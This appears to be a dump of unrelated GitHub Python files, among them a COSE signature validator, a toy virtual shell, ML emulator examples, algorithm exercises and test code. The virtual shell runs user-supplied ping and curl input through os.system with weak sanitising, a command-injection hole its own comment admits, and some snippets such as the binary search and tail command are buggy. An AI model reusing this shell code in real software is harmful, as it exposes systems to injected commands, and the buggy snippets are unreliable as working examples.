f.write(' '.join(obs) + '\n')
#####
log.close()
| flaviarogerio/demographic | cp_stats4.py | cp_stats4.py | py | 7,729 | python | en | code | 0 | github-code | 36 |
35076398379 | """This file contains the signature validator abstraction"""
import base64
import json
from cose.headers import KID
from cose.keys.keyops import VerifyOp
from cose.messages import Sign1Message
from cose.keys import CoseKey
from cose.algorithms import Es256, Ps256
from cose.keys.keytype import KtyEC2, KtyRSA
from cose.keys.keyparam import KpKty, KpKeyOps
from cose.keys.keyparam import KpAlg, EC2KpX, EC2KpY, EC2KpCurve, RSAKpE, RSAKpN
from cose.keys.curves import P256
from cose.exceptions import CoseException
from cryptography import x509
from cryptography.hazmat.primitives.asymmetric import ec, rsa
from cryptography.utils import int_to_bytes
from classes.TrustList import TrustList
class SignatureValidator:
"""Validate COSE signatures"""
def __init__(self, trust_list: TrustList):
self._trust_list = trust_list
def validate(self, payload: bytes):
"""Validates the signature, or returns the errors"""
try:
message = Sign1Message.decode(payload)
kid = self._get_kid(message)
print(f"KID = {kid}")
dsc = self._trust_list.find(kid)
cert: x509.base = dsc.certificate()
if cert is None:
return {
"valid": False,
"error": {
"type": "TRUST-LIST",
"message": f"KID {kid} not found in the trust-list"
}
}
message.key = self._get_key(cert)
if message.verify_signature():
return {
"valid": True,
"error": None
}
return {
"valid": False,
"error": "Invalid signature! Reason: unknown."
}
except UnicodeDecodeError as err:
return {
"valid": False,
"error": {
"type": "UNICODE",
"message": err
}
}
except json.decoder.JSONDecodeError as err:
return {
"valid": False,
"error": {
"type": "JSON",
"message": err
}
}
except (CoseException, AttributeError, TypeError) as err:
return {
"valid": False,
"error": {
"type": "COSE",
"message": err
}
}
@staticmethod
def _get_kid(message) -> str:
"""Returns the KID from the message"""
if KID in message.phdr.keys():
return base64.b64encode(message.phdr[KID]).decode("UTF-8")
return base64.b64encode(message.uhdr[KID]).decode("UTF-8")
@staticmethod
def _get_key(cert: x509.base) -> CoseKey:
"""Returns the CoseKey"""
if isinstance(cert.public_key(), rsa.RSAPublicKey):
return CoseKey.from_dict(
{
KpKeyOps: [VerifyOp],
KpKty: KtyRSA,
KpAlg: Ps256, # RSSASSA-PSS-with-SHA-256-and-MFG1
RSAKpE: int_to_bytes(cert.public_key().public_numbers().e),
RSAKpN: int_to_bytes(cert.public_key().public_numbers().n)
}
)
elif isinstance(cert.public_key(), ec.EllipticCurvePublicKey):
return CoseKey.from_dict(
{
KpKeyOps: [VerifyOp],
KpKty: KtyEC2,
EC2KpCurve: P256, # Ought o be pk.curve - but the two libs clash
KpAlg: Es256, # ecdsa-with-SHA256
EC2KpX: int_to_bytes(cert.public_key().public_numbers().x),
EC2KpY: int_to_bytes(cert.public_key().public_numbers().y)
}
)
else:
raise Exception(f"Algorithm unsupported: { cert.signature_algorithm_oid }")
| ryanbnl/eu-dcc-diagnostics | classes/SignatureValidator.py | SignatureValidator.py | py | 3,969 | python | en | code | 9 | github-code | 36 |
36754576461 | # Binary Search
def solution(A, value):
if (len(A) == 1) & (A[0] == value):
print(f'found it: {A[0]}')
return A[0]
elif (len(A) == 1) & (A[0] != value):
print('Not found it')
elif len(A) == 0:
print('Not found it')
elif len(A) > 1:
mid = len(A) // 2
print(A[mid])
if A[mid] == value:
print('found it: {A[mid]}')
return A[mid]
elif A[mid] > value:
A = A[0:mid]
solution(A,value)
elif A[mid] < value:
A = A[mid+1:]
solution(A,value)
A = [1,2,3,4,5,6,7,8,9,10]
x = solution(A,8)
| Quantanalyst/SoftwareEngineeringNotes | Data Structure and Algorithms/Popular Questions/BinarySearch.py | BinarySearch.py | py | 649 | python | en | code | 0 | github-code | 36 |
38488870579 | #!/usr/bin/env python3
#
# Bonus. GPE auto-training + GSA using external (from publication) dataset loaded from json file
#
import os
from gpytorch.likelihoods import GaussianLikelihood
from gpytorch.means import LinearMean
from gpytorch.kernels import MaternKernel, ScaleKernel
from GPErks.gp.data.dataset import Dataset
from GPErks.gp.experiment import GPExperiment
from GPErks.gp.mean import LinearMean
from GPErks.log.logger import get_logger
from GPErks.serialization.path import posix_path
from GPErks.train.emulator import GPEmulator
from GPErks.utils.random import set_seed
from GPErks.perks.gsa import SobolGSA
def main():
get_logger()
seed = 8
set_seed(seed)
device = "cpu"
# This new method loads your dataset into a dictionary where keys = features, values = Dataset objects
# (each Dataset is built to create the experiment that will emulate the corresponding scalar feature (key))
datasets = Dataset.build_from_file(posix_path(os.getcwd(), "data", "datasets", "Stefano_8p_sham.json"))
features = list(datasets.keys())
print(features) # available features to be emulated
# # Note: if you want to create a .json file containing your dataset, you can do so like this:
# X = np.loadtxt(data_dir / "X.txt", dtype=float)
# Y = np.loadtxt(data_dir / "Y.txt", dtype=float)
# xlabels = read_labels_from_file(data_dir / "xlabels.txt")
# ylabels = read_labels_from_file(data_dir / "ylabels.txt")
# data_dct = {
# "X_train": X.tolist(),
# "Y_train": Y.tolist(),
# # "X_val": X_val.tolist(), # (if available, otherwise can omit this dct key)
# # "Y_val": Y_val.tolist(), # (if available, otherwise can omit this dct key)
# # "X_test": X_test.tolist(), # (if available, otherwise can omit this dct key)
# # "Y_test": Y_test.tolist(), # (if available, otherwise can omit this dct key)
# "x_labels": xlabels, # (if available, otherwise can omit this dct key)
# "y_labels": ylabels, # (if available, otherwise can omit this dct key)
# # "l_bounds": a list here (if available, otherwise can omit this dct key)
# # "u_bounds": a list here (if available, otherwise can omit this dct key)
# "info": "A short description about the dataset"
# }
# with open(Path(os.getcwd())/"datasetname.json", "w") as f:
# json.dump(data_dct, f, indent=4)
#
# # Also note that there is already a utility function that does this for you:
# # from GPErks.utils.jsonfiles import create_json_dataset_from_arrays
feature = "EDV" # we will emulate just one feature as an example
# GPE auto-training
print(f"\nEmulating target feature: {feature}")
dataset = datasets[feature]
likelihood = GaussianLikelihood()
mean = LinearMean(degree=1, input_size=dataset.input_size, bias=True)
covariance = ScaleKernel(MaternKernel(ard_num_dims=dataset.input_size))
metrics = []
experiment = GPExperiment(
dataset,
likelihood,
mean,
covariance,
metrics=metrics,
seed=seed
)
emulator = GPEmulator(experiment, device)
emulator.train_auto() # you could use a more manual approach here with early stopping etc.
msg = experiment.print_stats()
print(f"\nFitted emulator hyperparameters:{msg}")
# GSA
gsa = SobolGSA(dataset, n=1024, seed=seed)
# the following method is used to perform GSA whenever a (trained) emulator object is available, also covering
# the case where it was trained using an externally imported dataset as in this example
gsa.estimate_Sobol_indices_with_emulator(emulator, n_draws=1000)
gsa.summary()
gsa.correct_Sobol_indices(threshold=0.01)
gsa.plot()
gsa.plot_donut()
gsa.plot_fancy_donut()
gsa.plot_heatmap()
gsa.plot_network()
if __name__ == "__main__":
main()
| stelong/GPErks | examples/example_bonus.py | example_bonus.py | py | 3,888 | python | en | code | 3 | github-code | 36 |
30807564816 | import copy
import os
import sys
# define our clear function
def clear():
# for windows
if os.name == 'nt':
_ = os.system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = os.system('clear')
def systemStrip(input):
return input.strip("").replace("&", "").replace("|", "").replace(";", "").replace("!", "").replace("\\", "")
def newFile(name, par, data):
temp = CustomFile(str(name), par)
temp.setContent(str(data))
return temp
class CustomFile:
def __init__(self, name, par):
self.parent = par
self.name = name
self.data = " "
self.type = "File"
def setContent(self, tempData):
self.data = tempData
def getContent(self):
return self.data
def appendContent(self, input):
self.data += str(input)
class Directory:
def __init__(self, name, par=None):
self.parent = None
if not par == None:
self.parent = par
self.children = []
self.name = name
self.type = "Directory"
def printChildren(self, showHidden):
if showHidden:
resultPC = ""
for x in self.children:
resultPC += str(x.name) + "\t"
print(resultPC)
elif not showHidden:
resultPC = ""
for x in self.children:
if str(x.name).startswith("."):
continue
else:
resultPC += str(x.name) + "\t"
print(resultPC)
def hasNext(self):
if len(self.children) != 0:
for thing in self.children:
if thing.type == "Directory":
return True
return False
def hasParent(self):
if not self.parent == None:
return True
return False
def next(self):
if self.hasNext() == True:
for thing in self.children:
if thing.type == "Directory":
return thing
return None
def nextDirectory(self, str):
if self.hasNext() == True:
for thing in self.children:
if thing.type == "Directory" and thing.name == str:
return thing
return None
def childrenNames(self):
tempArr = []
for child in self.children:
tempArr.append(child.name)
return tempArr
currentDirectory = Directory("~")
currentPath = []
currentPath.append(currentDirectory.name)
def refreshPath():
currentPath2 = []
pointerDirectory = Directory("ptr", currentDirectory)
pointerDirectory = pointerDirectory.parent
while pointerDirectory.hasParent():
currentPath2.append(str(pointerDirectory.name))
pointerDirectory = pointerDirectory.parent
continue
currentPath2.append(str(pointerDirectory.name))
currentPath2.reverse()
currentPath = currentPath2
#print("currentPath inside: " + str(currentPath2))
#print("currentPath outside-from-in: " + str(currentPath))
return currentPath2
def printPath():
tempArr = refreshPath()
#print("temp: " + str(tempArr))
resultA = ""
for i in tempArr:
resultA += str(i) + "/"
print(resultA)
return resultA
'''
custom heirarchy start
'''
DocumentsInit = Directory("Documents", currentDirectory)
SpecialDocs = Directory("SpecialDocs", DocumentsInit)
Hello2 = CustomFile("HelloWorld2.txt", DocumentsInit)
Hello2.setContent("Hello, Programmer!")
DocumentsInit.children.append(Hello2)
DocumentsInit.children.append(SpecialDocs)
currentDirectory.children.append(DocumentsInit)
currentDirectory.children.append(Directory("Downloads", currentDirectory))
currentDirectory.children.append(Directory("UserInfo", currentDirectory))
currentDirectory.children.append(newFile("HelloWorld.txt", currentDirectory, "Hello, World!"))
'''
custom heirarchy end
'''
while(True):
inputRaw = input("user@virtualShell: ")
inputRaw = inputRaw.strip()
inputArray0 = inputRaw.split(" ")
inputArray0t = []
inputArray1 = []
for i in inputArray0:
temp = i.split("-")
for x in temp:
inputArray0t.append(x)
for i in inputArray0t:
temp = i.split("/")
for x in temp:
inputArray1.append(x)
inputFirst = inputArray1[0]
print(str(inputArray1))
if str(inputFirst) == "cd":
inputArray1.pop(0)
for i in range(0, len(inputArray1)):
if len(inputArray1) > 0 and inputArray1[0] == "~":
while currentDirectory.parent is not None:
currentDirectory = currentDirectory.parent
refreshPath()
elif len(inputArray1) > 0 and inputArray1[0] in currentDirectory.childrenNames():
i = currentDirectory.childrenNames().index(inputArray1[0])
x = currentDirectory.children[i]
if x.type == "Directory":
currentDirectory = x
refreshPath()
elif x.type == "File":
print('\"' + inputArray1[0] + '\"' + ' is not a directory')
else:
print('\"' + inputArray1[0] + '\"' + ' is not a directory')
elif inputArray1[0] == "..":
if currentDirectory.parent is not None:
currentDirectory = currentDirectory.parent
refreshPath()
else:
print("Root directory has no parents, it's like batman")
else:
print("not a valid Directory")
refreshPath()
inputArray1.pop(0)
if len(inputArray1) == 0:
printPath()
elif str(inputFirst) == "ls":
inputArray1.pop(0)
argsArray = [""]
for i in range(2, len(inputRaw)):
argsArray += inputRaw[i]
if "a" in argsArray or "A" in argsArray:
currentDirectory.printChildren(True)
#print("revealing hidden files")
else:
printPath()
currentDirectory.printChildren(False)
elif str(inputFirst) == "cat":
inputArray1.pop(0)
for i in range(0, len(inputArray1)):
if len(inputArray1) > 0 and inputArray1[0] in currentDirectory.childrenNames():
i = currentDirectory.childrenNames().index(inputArray1[0])
x = currentDirectory.children[i]
if x.type == "File":
print(x.getContent())
refreshPath()
break
else:
print("" + x.name + " does not have attribute: 'file_data'")
break
elif str(inputFirst).lower() == "mkdir" or str(inputFirst).lower() == "mkDir":
inputArray1.pop(0)
currentNames = currentDirectory.childrenNames()
if len(inputArray1) > 0 and inputArray1[0] in currentNames:
print("There is already a File or Directory with the given name in the current Directory")
continue
for i in range(0, len(inputArray1)):
if len(inputArray1) > 0:
currentDirectory.children.append(Directory(inputArray1[0], currentDirectory))
refreshPath()
break
elif str(inputFirst).lower() == "touch":
inputArray1.pop(0)
for i in range(0, len(inputArray1)):
if len(inputArray1) > 0:
currentDirectory.children.append(CustomFile(inputArray1[0], currentDirectory))
refreshPath()
break
elif str(inputFirst).lower() == "cls" or str(inputFirst).lower() == "clear":
inputArray1.pop(0)
"""
script = '''
echo "hello"
cls
'''
os.system("bash -c '%s'" % script)
"""
clear()
elif str(inputFirst).lower() == "exit":
sys.exit()
elif str(inputFirst).lower() == "vim" or str(inputFirst).lower() == "kate" or str(inputFirst).lower() == "gedit":
inputArray1.pop(0)
if len(inputArray1) > 0 and inputArray1[0] in currentDirectory.childrenNames():
i = currentDirectory.childrenNames().index(inputArray1[0])
x = currentDirectory.children[i]
if x.type == "File":
q1 = input("do you wish to set the content(erasing all old data)? y/n: ")
if (str(q1)[0:1:1]).lower() == "y":
print("Please write content to be written:")
q2 = input()
x.setContent(str(q2))
else:
q4 = input("do you wish to append to the File? y/n: ")
if (str(q4)[0:1:1]).lower() == "y":
print("Please write content to be appended:")
q3 = input()
x.appendContent(str(q3))
elif str(inputFirst).lower() == "ping":
inputArray1.pop(0)
command = str("ping ") + str(inputArray1[0])
# there is a potential security vulnerability here. If they put ping xxxx && somecommand or the sort && ping
command = systemStrip(str(command))
os.system(str(command))
elif str(inputFirst).lower() == "echo":
print(str(inputRaw[5::1]))
elif str(inputFirst).lower() == "curl":
command = inputRaw
command = systemStrip(str(command))
os.system(str(command))
elif str(inputFirst).lower() == "head":
inputArray1.pop(0)
if len(inputArray1) > 0 and inputArray1[0] in currentDirectory.childrenNames():
i = currentDirectory.childrenNames().index(inputArray1[0])
x = currentDirectory.children[i]
if x.type == "File":
tempData = x.data
tempDataArr = tempData.splitlines(True)
if len(tempDataArr) < 11:
for x in tempDataArr:
print(str(x))
else:
count = 0
while count < 10:
print(str(tempDataArr[count]))
count += 1
if len(tempDataArr) == 0:
print() # intentionally print a single blank line
elif str(inputFirst).lower() == "tail":
inputArray1.pop(0)
if len(inputArray1) > 0 and inputArray1[0] in currentDirectory.childrenNames():
i = currentDirectory.childrenNames().index(inputArray1[0])
x = currentDirectory.children[i]
if x.type == "File":
tempData = x.data
tempDataArr = tempData.splitlines(True)
if len(tempDataArr) < 11:
for x in tempDataArr:
print(str(x))
else:
count = 0
fileLength = int(len(tempDataArr))
while count < 10:
print(str(tempDataArr[fileLength - count]))
count += 1
if len(tempDataArr) == 0:
print() # intentionally print a single blank line
elif str(inputFirst).lower() == "rm":
inputArray1.pop(0)
if len(inputArray1) == 0:
print("Please give an argument for rm")
found = False
for num in range(0, len(inputArray1)):
if len(inputArray1) > 0 and inputArray1[num] in currentDirectory.childrenNames():
i = currentDirectory.childrenNames().index(inputArray1[num])
x = currentDirectory.children[i]
if x.type == "File":
currentDirectory.children.remove(x)
found = True
break
if x.type == "Directory" and "r" in inputArray1:
currentDirectory.children.remove(x)
found = True
break
elif x.type == "Directory":
print('Cannot delete, please pass \"-r\" argument in order to delete Directories\n\t*Doing so will also delete all files and folders therein')
found = True
break
if not found:
print("Syntax error: Unable to Locate File")
elif str(inputFirst).lower() == "":
continue
else:
print('\"' + inputFirst + '\" is not a valid command')
#printPath()
'''
rm * added
mv *
save functionality *
find command
grep command
system call to SSH #don't want, don't see the use
ftp #don't want, don't see the use
'''
| Treelovah/dev-null | console.py | console.py | py | 12,973 | python | en | code | 0 | github-code | 36 |
9959099201 | import random
import itertools
import math
import json
from functions.counting import counting
from functions.multi_arithematic import multiple_operations_two_ops
from functions.single_arithematic import single_arithematic
from functions.avg_val import average_point_value
from functions.permutation_combination import permutations
from functions.permutation_combination import combinations
from functions.probability import probability_questions
from functions.comparisions import comparison_questions
from functions.logical import logical_questions
from functions.number_theory import number_theory_questions
from functions.graph_theory import generate_graph_theory_questions
from functions.pattern_recognition import pattern_recognition_questions
from functions.geometry import generate_shape_questions
from functions.clock import generate_clock_time_questions
from functions.algorithmic_reasoning import knapsack_questions
from functions.algorithmic_reasoning import greedy_questions
from functions.algorithmic_reasoning import sort_and_median_questions
from functions.algorithmic_reasoning import recursion_questions
from functions.temporal import temporal_questions
from functions.incomplete_question import incomplete_questions
from functions.spatial_reasoning import spatial_reasoning_questions
plural_dictionary = {
"fruit": "fruits",
"apple": "apples",
"orange": "oranges",
"banana": "bananas",
"strawberry": "strawberries",
"grape": "grapes",
"vegetable": "vegetables",
"carrot": "carrots",
"broccoli": "broccoli",
"tomato": "tomatoes",
"potato": "potatoes",
"cabbage": "cabbages",
"animal": "animals",
"dog": "dogs",
"cat": "cats",
"elephant": "elephants",
"giraffe": "giraffes",
"dolphin": "dolphins",
"geometry": "geometries",
"triangle": "triangles",
"square": "squares",
"pentagon": "pentagons",
"hexagon": "hexagons",
"octagon": "octagons",
"clock" : "clocks",
}
object_dictionary = {
"fruit": {
"items": [
"apple",
"orange",
# "banana",
# "strawberry",
# "grape",
],
"range": [1]
},
"vegetable": {
"items": [
"carrot",
"broccoli",
# "tomato",
# "potato",
# "cabbage"
],
"range": [1]
},
"animal":{
"items": [
"dog",
"cat",
# "elephant",
# "giraffe",
# "dolphin"
],
"range": [1]
},
"geometry": {
"items": [
"triangle",
"square",
"pentagon",
"hexagon",
"octagon"
],
"range": [1]
},
"clock": {
"items": [
"clock 1",
"clock 2",
"clock 3",
"clock 4",
"clock 5",
"clock 6",
"clock 7",
"clock 8",
"clock 9",
"clock 10",
"clock 11",
"clock 12"
],
"range": [1]
}
}
def determine_object_type(sampled_items):
categories = set()
for item in sampled_items:
for category, details in object_dictionary.items():
if item in details["items"]:
categories.add(category)
break
if len(sampled_items) == 1:
return "single_object"
elif len(categories) == 1:
return "intra_category"
else:
return "inter_category"
def test_create_QA():
obj_to_return = []
question_item = {'clock 1': 1, 'square':2, 'orange': 4}
object_key = determine_object_type([item for item in question_item.keys()])
qa_pairs = []
# qa_pairs += counting(question_item, object_key)
# qa_pairs += multiple_operations_two_ops(question_item, object_key)
# qa_pairs += single_arithematic(question_item, object_key)
# qa_pairs += average_point_value(question_item, object_key)
# qa_pairs += permutations(question_item, object_key)
# qa_pairs += combinations(question_item, object_key)
# qa_pairs += probability_questions(question_item, object_key)
# qa_pairs += comparison_questions(question_item, object_key)
# qa_pairs += logical_questions(question_item, object_key)
# qa_pairs += number_theory_questions(question_item, object_key)
# qa_pairs += generate_graph_theory_questions(question_item, object_key)
# qa_pairs += pattern_recognition_questions(question_item, object_key)
# qa_pairs += knapsack_questions(question_item, object_key)
# qa_pairs += greedy_questions(question_item, object_key)
# qa_pairs += sort_and_median_questions(question_item, object_key)
# qa_pairs += recursion_questions(question_item, object_key)
# qa_pairs += temporal_questions(question_item, object_key)
# qa_pairs += incomplete_questions(question_item, object_key)
# qa_pairs += spatial_reasoning_questions(question_item, object_key)
# qa_pairs += generate_shape_questions(question_item, object_key)
qa_pairs += generate_clock_time_questions(question_item, object_key)
obj_to_return.append({
"obj_json": question_item,
"qa_pairs": qa_pairs,
})
return obj_to_return
def create_QA():
obj_to_return = []
total_questions = 0
# Flatten the items across all categories
all_items = []
for category, details in object_dictionary.items():
all_items.extend(details["items"])
items_range = [1, 5] # A generic range for simplicity
for L in range(1, len(all_items) + 1):
if L<=9:
for sampled_items in itertools.combinations(all_items, L):
object_type = determine_object_type(sampled_items)
number_of_objects = len(sampled_items)
item_count_values = [i for i in range(items_range[0], items_range[1] + 1)]
lists = [item_count_values] * number_of_objects
for combination in itertools.product(*lists):
index = 0
qa_pairs = []
question_item = {}
for item in sampled_items:
item_count = combination[index]
question_item[item] = item_count
index += 1
# Now, we generate questions for these combinations
qa_pairs += counting(question_item, object_type)
# qa_pairs += multiple_operations_two_ops_extended(number_of_objects, sampled_items, question_item)
obj_to_return.append({
"obj_json": question_item,
"qa_pairs": qa_pairs,
})
total_questions += len(qa_pairs)
print(f"Total questions: {total_questions}")
return obj_to_return
if __name__ == "__main__":
file_path = 'D:\MLMM_ASU\MLLM_Evaluation_Scale\display3.json'
with open(file_path, 'w') as f:
json.dump(test_create_QA(), f) | GVS-007/MLLM_Reasoning | final_data_creation.py | final_data_creation.py | py | 7,225 | python | en | code | 0 | github-code | 36 |
3419259967 | from spectractor import parameters
from spectractor.simulation.simulator import AtmosphereGrid, SpectrumSimulatorSimGrid
from spectractor.config import load_config
from spectractor.simulation.image_simulation import ImageSim
from spectractor.logbook import LogBook
from spectractor.extractor.extractor import Spectractor
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument(dest="input", metavar='path', default=["tests/data/reduc_20170530_134.fits"],
help="Input fits file name. It can be a list separated by spaces, or it can use * as wildcard.",
nargs='*')
parser.add_argument("-d", "--debug", dest="debug", action="store_true",
help="Enter debug mode (more verbose and plots).", default=False)
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true",
help="Enter verbose (print more stuff).", default=False)
parser.add_argument("-o", "--output_directory", dest="output_directory", default="outputs/",
help="Write results in given output directory (default: ./outputs/).")
parser.add_argument("-l", "--logbook", dest="logbook", default="./tests/data/ctiofulllogbook_jun2017_v5.csv",
help="CSV logbook file. (default: ./tests/data/ctiofulllogbook_jun2017_v5.csv).")
parser.add_argument("-c", "--config", dest="config", default="config/ctio.ini",
help="INI config file. (default: config.ctio.ini).")
args = parser.parse_args()
parameters.VERBOSE = args.verbose
if args.debug:
parameters.DEBUG = True
parameters.VERBOSE = True
file_names = args.input
load_config(args.config)
logbook = LogBook(logbook=args.logbook)
for file_name in file_names:
tag = file_name.split('/')[-1]
disperser_label, target, xpos, ypos = logbook.search_for_image(tag)
if target is None or xpos is None or ypos is None:
continue
spectrum_file_name = args.output_directory + '/' + tag.replace('.fits', '_spectrum.fits')
atmgrid = AtmosphereGrid(file_name)
image = ImageSim(file_name, spectrum_file_name, args.output_directory, A1=1, A2=1,
pwv=5, ozone=300, aerosols=0.03,
psf_poly_params=None, with_stars=True)
sim_file_name = args.output_directory + tag.replace('reduc_', 'sim_')
Spectractor(sim_file_name, args.output_directory, target, [xpos, ypos], disperser_label, args.config)
| LSSTDESC/Spectractor | runSimulator.py | runSimulator.py | py | 2,608 | python | en | code | 13 | github-code | 36 |
14380560581 | from typing import *
class Solution:
def floodFill(self, image: List[List[int]], sr: int, sc: int, color: int) -> List[List[int]]:
rows = len(image)
cols = len(image[0])
source = image[sr][sc]
if color == source:
return image
def helper(sr, sc):
if image[sr][sc] == source:
image[sr][sc] = color
if sr >= 1:
helper(sr - 1, sc)
if sr < rows - 1:
helper(sr + 1, sc)
if sc >= 1:
helper(sr, sc - 1)
if sc < cols - 1:
helper(sr, sc + 1)
helper(sr, sc)
return image
| jithindmathew/LeetCode | flood-fill.py | flood-fill.py | py | 735 | python | en | code | 0 | github-code | 36 |
18056687843 | from one_layer_net_base import OneLayerNetBase
class OneLayerNet(OneLayerNetBase):
def calc_corrections(self, vector, learning_rate):
for j in range(len(self.neurons)):
error = vector.get_desired_outputs()[j] - self.neurons[j].get_out()
weights_deltas = [0] * len(self.neurons[j].get_weights())
weights_deltas[0] = learning_rate * error
for i in range(len(self.neurons[j].get_weights()) - 1):
weights_deltas[i + 1] = learning_rate * error * vector.get_x()[i]
self.neurons[j].correct_weights(weights_deltas)
def activation_func(self, net):
return 1.0 if net >= 0 else 0.0
def calc_loss(self, vector):
loss = 0
for j in range(len(self.neurons)):
loss += abs(vector.get_desired_outputs()[j] - self.neurons[j].get_out())
return loss
| StanislavMakhrov/OneLayerPerceptron | pure_python/one_layer_net_delta_rule.py | one_layer_net_delta_rule.py | py | 873 | python | en | code | 0 | github-code | 36 |
72734862185 | from qblockchain import QBlockchain
import hashlib
def main():
qbc = QBlockchain()
qbc.mine_block("First block 1")
print(qbc.is_chain_valid())
#qbc.break_up_4bit_values([0000])
#qbc.xor(["23ab0","12ab0"],4)
xor_bin = qbc.xor(str("1234"), str("abc0"), 4)
hashOut = hashlib.sha3_256(xor_bin.encode("ascii")).hexdigest()
print(hashOut)
text = "0000000"
hashIn = hashlib.sha3_256(text.encode("ascii")).hexdigest() # hashing the 'text' input
#string-type output
print ('hashIn-hex:', hashIn, 'length:', len(hashIn))
# convert hashIn(hex) to hashIn_bin(binary)
scale = 16 #hex base
hashIn_bin = bin(int(hashIn, scale))[2:].zfill(len(hashIn)*4)
print ('hashIn-binary:', str(hashIn_bin), 'length:', len(hashIn_bin))
#input hashIn string
fourbit_array = qbc.break_up_4bit_values(hashIn_bin)
print(len(fourbit_array))
q_par = [int(fourbit_array[i],2) for i in range(len(fourbit_array)-1)] #throwing away the last string element
#circuit = qbc.quantum_circuit(q_par, 1)
def mine():
bc = QBlockchain("qasm_simulator")
bc.mine_block("any str")
bc.mine_using_simu(2)
def starts_with(new_hash, starts):
res = new_hash.startswith(starts)
print(res)
return res
if __name__ == "__main__":
#main()
mine()
starts_with("Hello wello","Hello")
starts_with("b502d86bf9ed32cfcc64414bb0d129718ba0961144083c2f26358edbd312040d","00") | asiaat/python_qblockchain | main.py | main.py | py | 1,487 | python | en | code | 0 | github-code | 36 |
16620383859 | # @Author: Billy Li <billyli>
# @Date: 06-05-2022
# @Email: li000400@umn.edu
# @Last modified by: billyli
# @Last modified time: 06-06-2022
import sys
from pathlib import Path
import shutil
import numpy as np
from scipy.stats import uniform
data_dir = Path.cwd().parent.joinpath("data")
sys.path.insert(1, str(data_dir))
from hit_generator import stochastic
from util import plot_in_RAM, small_helix_check, hits2arc
from information import *
def discretize(x, min, max, res):
# return the discretized index of a value given a range and resolution
step = (max-min)/res
result = (x-min)//step
if result >= res:
result = res-1
return int(result)
def xy2map(xs, ys, res):
# return a z-t ptcl number map
map = np.zeros(shape=(res,res), dtype=float)
xmin, xmax = -810, 810
ymin, ymax = -810, 810
for x, y in zip(xs, ys):
xIdx = discretize(x, xmin, xmax, res)
yIdx = discretize(y, ymin, ymax, res)
map[res-1-yIdx, xIdx] = 1.0
return map
# feature_dir_default =
def make_data_single_track(feature_dir):
feature_dir.mkdir(parents=True, exist_ok=True)
### set dataset property
# Number of samples
N_data = 100
N_generated = 0
# quality cut
dx_min = 100
dy_min = 100
res = 256
# set track source (db files)
track_dir = Path.cwd().parent.parent.joinpath('data').joinpath('raw')
db_list = ["train_CeEndpoint-mix-fromCSV_1.db",
"train_CeEndpoint-mix-fromCSV_2.db",\
"train_CeEndpoint-mix-fromCSV_3.db"]
file_list = [track_dir.joinpath(db) for db in db_list]
# set track distribution
dist = uniform(loc=1, scale=0)
# set track generator
gen = stochastic(dist=dist, db_files=file_list, hitNumCut=20)
X = []
Y = []
while N_generated < N_data:
hit_dict = gen.generate(mode='production')
if small_helix_check(hit_dict,dx_min=dx_min,dy_min=dy_min):
continue
else:
sys.stdout.write(t_info(f'Finding qualified track: {N_generated+1}/{N_data}', special='\r'))
if N_generated+1 == N_data:
sys.stdout.write('\n')
sys.stdout.flush()
x = plot_in_RAM(hit_dict, res)
x = x.reshape(res,res)
X.append(x)
a, b, R = hits2arc(hit_dict)
y = xy2map([a], [b], int(res/8))
N_generated += 1
Y.append(y)
X = np.array(X)
Y = np.array(Y)
X_file = feature_dir.joinpath("X.npy")
Y_file = feature_dir.joinpath("Y.npy")
np.save(X_file, X)
np.save(Y_file, Y)
return
if __name__ == "__main__":
data_dir = Path.cwd().parent.parent.joinpath("data")
feature_dir = data_dir.joinpath("interm").joinpath("single_track")
make_data_single_track(feature_dir)
| billy000400/CircNN | src/features/make_data_single_track.py | make_data_single_track.py | py | 2,828 | python | en | code | 0 | github-code | 36 |
13990400448 | from collections import defaultdict
from sys import maxint
class Solution(object):
def getClosest(self, S, t):
closest = None
minDiff = maxint
for k, x in S:
diff = abs(t - x)
if diff < minDiff:
minDiff = diff
closest = k, x
return closest
def minTransfers(self, transactions):
"""
:type transactions: List[List[int]]
:rtype: int
"""
snd = lambda t: t[1]
balance = defaultdict(lambda: 0)
for x, y, z in transactions:
balance[x] += z
balance[y] -= z
pos, neg = [], []
for k, b in balance.iteritems():
if b > 0:
pos.append((k, b))
elif b < 0:
neg.append((k, -b))
opers = 0
while neg:
kn, negBal = max(neg, key=snd)
neg.remove((kn, negBal))
kp, posBal = self.getClosest(pos, negBal)
pos.remove((kp, posBal))
rem = negBal - posBal
if rem > 0:
neg.append((kn, rem))
elif rem < 0:
pos.append((kp, -rem))
opers += 1
return opers
# trans = [[0,1,10],[2,0,5]]
# trans = [[0,1,10], [1,0,1], [1,2,5], [2,0,5]]
trans = [[1, 8, 1], [1, 13, 21], [2, 8, 10], [3, 9, 20], [4, 10, 61],
[5, 11, 61], [6, 12, 59], [7, 13, 60]]
print(Solution().minTransfers(trans))
| dariomx/topcoder-srm | leetcode/zero-pass/google/optimal-account-balancing/Solution3.py | Solution3.py | py | 1,460 | python | en | code | 0 | github-code | 36 |
25163396057 |
import os
from unittest import mock
from easul import util
from easul.driver import MemoryDriver
from easul.visual import Visual
from easul.tests.example import diabetes_progression_algorithm, prog_input_data, no_prog_input_data
import logging
from easul.visual.element import Prediction
from easul.visual.element.prediction import ProbabilityPlot, LimeTablePlot
logging.basicConfig(level = logging.INFO)
LOG = logging.getLogger(__name__)
from easul.tests.example import EXAMPLE_PATH
import anys
import pytest
prog_result = {"value":1,"label":"Progression", "probabilities":[{"value":0,"label":"No progression","probability":0.26},{"value":1,"label":"Progression","probability":0.74}]}
no_prog_result = {"value":0,"label":"No progression", "probabilities":[{"value":0,"label":"No progression","probability":0.67},{"value":1,"label":"Progression","probability":0.33}]}
row_simple_elements = [
(ProbabilityPlot, anys.AnyContains("data:image/png;base64"), prog_result),
(Prediction, anys.AnyContains("<h5>Progression</h5>"), prog_result),
(Prediction, anys.AnyContains("<h5>No progression</h5>"), no_prog_result)
]
row_explain_elements = [
(LimeTablePlot, anys.AnyContains("ldl, low-density lipoproteins</b> is less than 95.85"), prog_input_data),
(LimeTablePlot, anys.AnyContains("ldl, low-density lipoproteins</b> is less than 95.85"), no_prog_input_data),
]
@pytest.mark.parametrize("element_cls,expected_html,result", row_simple_elements)
def test_create_simple_elements_for_ml(element_cls, expected_html, result):
driver = MemoryDriver.from_reference("A1", autocreate=True)
visual = Visual(elements=[
element_cls()
